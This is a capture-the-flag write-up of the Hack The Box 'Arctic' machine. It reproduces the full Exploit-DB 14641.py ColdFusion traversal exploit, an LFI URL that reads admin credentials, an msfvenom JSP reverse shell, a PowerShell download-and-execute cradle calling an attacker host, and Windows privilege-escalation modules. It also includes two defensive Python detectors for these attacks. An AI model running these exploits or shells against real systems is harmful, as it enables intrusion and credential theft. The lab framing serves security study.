10.10.10.11 - Arctic - LFI, Win2008 Priv Esc

ColdFusion JSP Shell Upload/MS10-092/MS16-014

Summary:

Vulnerable software: CFIDE (Adobe ColdFusion 8 administrator); POC: 14641.py (see below)
System vulnerable: 10.10.10.11:8500
Vulnerability explanation: Adobe ColdFusion Unspecified Directory Traversal Vulnerability (CVE-2010-2861)
Severity: critical

Enumeration:

Command run:

nmap 10.10.10.11 -sV -sC

Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-30 07:47 GMT
Nmap scan report for 10.10.10.11
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directory Enumeration:

Adobe ColdFusion Version 8 administrative panel at http://10.10.10.11:8500/CFIDE/administrator/.

Details of the exploit, Adobe ColdFusion - Directory Traversal (Exploit-DB 14641.py):

$ cat /usr/share/exploitdb/exploits/multiple/remote/14641.py
# Working GET request courtesy of carnal0wnage:
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm"
#!/usr/bin/python
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
# leo 13.08.2010
# (Python 2 syntax: print statements, str sockets)
import sys
import socket
import re

# in case some directories are blocked: every CFIDE page that passes the
# "locale" parameter through the vulnerable code path is tried in turn
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm",
             "/CFIDE/administrator/archives/index.cfm",
             "/cfide/install.cfm",
             "/CFIDE/administrator/entman/index.cfm",
             "/CFIDE/administrator/enter.cfm")

# raw HTTP request; the blank line separates headers from the body, and the
# body is "locale=%00<path>%00a", which is 14 bytes longer than <path>
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d

locale=%%00%s%%00a"""

def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]
    for f in filenames:
        print "------------------------------"
        print "trying", f
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))
        # read the whole response until the server closes the connection
        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
        # the included file's contents are reflected inside the page <title>
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print title
            print "------------------------------"

if __name__ == '__main__':
    main()

We use the LFI vulnerability at http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en to retrieve the credentials (the ../ sequence walks out of the locale directory and the %00 null byte truncates the suffix the application appends to the locale value):

Thanks to the LFI vulnerability we extracted the username and hashed password for the login panel:

The password hash 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 corresponds to the password happyday (ColdFusion 8 stores the administrator password in password.properties as an unsalted SHA-1 hash, so it is easily recovered).
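As an added, defender-side example (not part of the original writeup), the following Python script scans constructed web-server access-log lines for the CVE-2010-2861 pattern the request above uses: a locale parameter carrying ../ traversal and a %00 null byte on one of the CFIDE pages that 14641.py tries. The sample log lines, the watched-page set and the function names scan_access_log and classify_locale are assumptions for the example; percent-decoding is repeated so that encoded or double-encoded variants normalize to the same form before matching.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log-format line: client, identd, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Pages the public exploit (14641.py) tries; compared in lower case because
# ColdFusion on Windows resolves paths case-insensitively.
WATCHED_PAGES = {
    "/cfide/wizards/common/_logintowizard.cfm",
    "/cfide/administrator/archives/index.cfm",
    "/cfide/install.cfm",
    "/cfide/administrator/entman/index.cfm",
    "/cfide/administrator/enter.cfm",
}

# Constructed sample log lines for this example (not taken from any real server).
SAMPLE_LOG = """\
10.10.14.20 - - [30/Jan/2019:07:50:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 1432
10.10.14.20 - - [30/Jan/2019:07:50:02 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 5120
10.10.14.21 - - [30/Jan/2019:07:51:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 1432
10.10.14.22 - - [30/Jan/2019:07:52:33 +0000] "GET /CFIDE/wizards/common/_logintowizard.cfm?locale=..%2f..%2f..%2fColdFusion8%2flib%2fpassword.properties%2500en HTTP/1.1" 200 1432
"""


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads normalize."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_locale(value):
    """Return the list of suspicious traits found in a locale parameter value."""
    decoded = fully_decode(value)
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte")
    if re.search(r"\.\.[\\/]", decoded):
        reasons.append("directory traversal")
    if "password.properties" in decoded.lower():
        reasons.append("targets password.properties")
    return reasons


def scan_access_log(text):
    """Return one finding per request whose locale parameter looks like CVE-2010-2861 abuse."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path.lower() not in WATCHED_PAGES:
            continue
        # parse_qs percent-decodes once; fully_decode() handles further layers
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get("locale", []):
            reasons = classify_locale(value)
            if reasons:
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("ts"),
                    "page": parts.path,
                    "locale": fully_decode(value).replace("\x00", "\\x00"),
                    "reasons": reasons,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['page']} -> {', '.join(f['reasons'])}: {f['locale']}")
```

Two of the four constructed lines are flagged: the plain request and the double-encoded one. Note that the POST variant in 14641.py carries locale in the request body, which ordinary access logs do not record, so retrospective hunting over access logs only covers the GET form; request-body inspection at the reverse proxy, or the vendor hotfix for CVE-2010-2861, covers both.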

Once logged in, locate Scheduled Tasks and add the following routine:

The task's output file path is: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp

Shell built with:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > shell.jsp

Upon requesting http://10.10.10.11:8500/CFIDE/shell.jsp, we get a reverse shell:

User flag:

C:\Users\tolis\Desktop>more user.txt
more user.txt
02650d3a69a70780c302e146a6cb96f3

Alternatively, we can catch our reverse shell with a Metasploit handler:

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.20:4444
msf5 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                     Payload opts
  --  ----                    -------                     ------------
  0   Exploit: multi/handler  java/jsp_shell_reverse_tcp  tcp://10.10.14.20:4444

msf5 exploit(multi/handler) > [*] Command shell session 1 opened (10.10.14.20:4444 -> 10.10.10.11:49483) at 2019-01-31 02:22:25 +0000

Our current payload is a plain command shell, not Meterpreter; we can upgrade it with the web_delivery module:

msf5 exploit(multi/script/web_delivery) > options

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4455             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   2   PSH


msf5 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.20:4455
msf5 exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8080/YVCJiGqyEy7pQbC
[*] Local IP: http://10.8.234.17:8080/YVCJiGqyEy7pQbC
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');
[*] 10.10.10.11 web_delivery - Delivering Payload
[*] Sending stage (206403 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.20:4455 -> 10.10.10.11:49582) at 2019-01-31 02:35:36 +0000
msf5 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                                                       Connection
  --  ----  ----                     -----------                                                                       ----------
  1         shell java/linux         Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation...  10.10.14.20:4444 -> 10.10.10.11:49560 (10.10.10.11)
  2         meterpreter x64/windows  ARCTIC\tolis @ ARCTIC
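As an added, defender-side example (not from the writeup and not Metasploit code), the following Python triages constructed process-creation records and scores PowerShell command lines for the traits the web_delivery cradle above exhibits: no profile, hidden window, a WebClient download, in-memory execution with IEX, a bare IP:port URL and proxy-credential reuse. The event records, the indicator weights, the alert threshold and the function names score_command and triage are assumptions for the example.

```python
import re

# Constructed process-creation records in the shape of Sysmon event 1 / Security 4688
# fields; the first command line is the one web_delivery printed above.
SAMPLE_EVENTS = [
    {
        "host": "ARCTIC",
        "user": "ARCTIC\\tolis",
        "parent": "C:\\Windows\\System32\\cmd.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -c $n=new-object net.webclient;"
                   "$n.proxy=[Net.WebRequest]::GetSystemWebProxy();"
                   "$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
                   "IEX $n.downloadstring('http://10.10.14.20:8080/YVCJiGqyEy7pQbC');",
    },
    {
        "host": "ARCTIC",
        "user": "ARCTIC\\tolis",
        "parent": "C:\\Windows\\System32\\taskeng.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    },
    {
        "host": "ARCTIC",
        "user": "ARCTIC\\tolis",
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -w hidden -c Get-Date",
    },
]

# (name, regex applied to the lower-cased command line, weight); weights are an
# assumption for this example and should be tuned against real baselines.
INDICATORS = [
    ("no_profile",      r"-nop\b|-noprofile\b",                                                  1),
    ("hidden_window",   r"-w(?:indowstyle)?\s+hidden",                                           2),
    ("download_cradle", r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b", 3),
    ("in_memory_exec",  r"\biex\b|invoke-expression",                                            3),
    ("bare_ip_url",     r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/",                           2),
    ("proxy_creds",     r"getsystemwebproxy|defaultcredentials",                                 1),
]

URL_RE = re.compile(r"https?://[^\s'\"()]+")


def score_command(cmdline):
    """Return (score, matched indicator names) for one command line."""
    lower = cmdline.lower()
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, lower)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def triage(events, threshold=6):
    """Flag PowerShell launches whose indicator score reaches the threshold."""
    alerts = []
    for ev in events:
        if not ev["image"].lower().endswith("\\powershell.exe"):
            continue
        score, hits = score_command(ev["cmdline"])
        if score < threshold:
            continue
        url = URL_RE.search(ev["cmdline"])  # the staging URL, if any, for blocking/pivoting
        alerts.append({
            "host": ev["host"],
            "user": ev["user"],
            "parent": ev["parent"],
            "score": score,
            "hits": hits,
            "url": url.group(0) if url else None,
        })
    return alerts


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a['score']}] {a['host']} {a['user']} parent={a['parent']} "
              f"hits={','.join(a['hits'])} url={a['url']}")
```

Scoring instead of matching the exact string matters because the URI path is random on every run of the module and the cradle's wording varies between tools; the hidden-window-only launch scores 2 and stays below the threshold, while the full cradle scores 12. Recording the parent process in the alert is worthwhile: a PowerShell process whose ancestry leads back to the web server's worker is anomalous on its own.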

Privilege Escalation:

We try the first exploit on the list, and ms10_092_schelevator works beautifully on 10.10.10.11.

Note to self: research how recent CVE-2018-8440 can be used to exploit this and other versions of Windows.

Alternatively, use:

ms16_014_wmi_recv_notif

Both exploits provide administrative access to this Windows 2008 machine: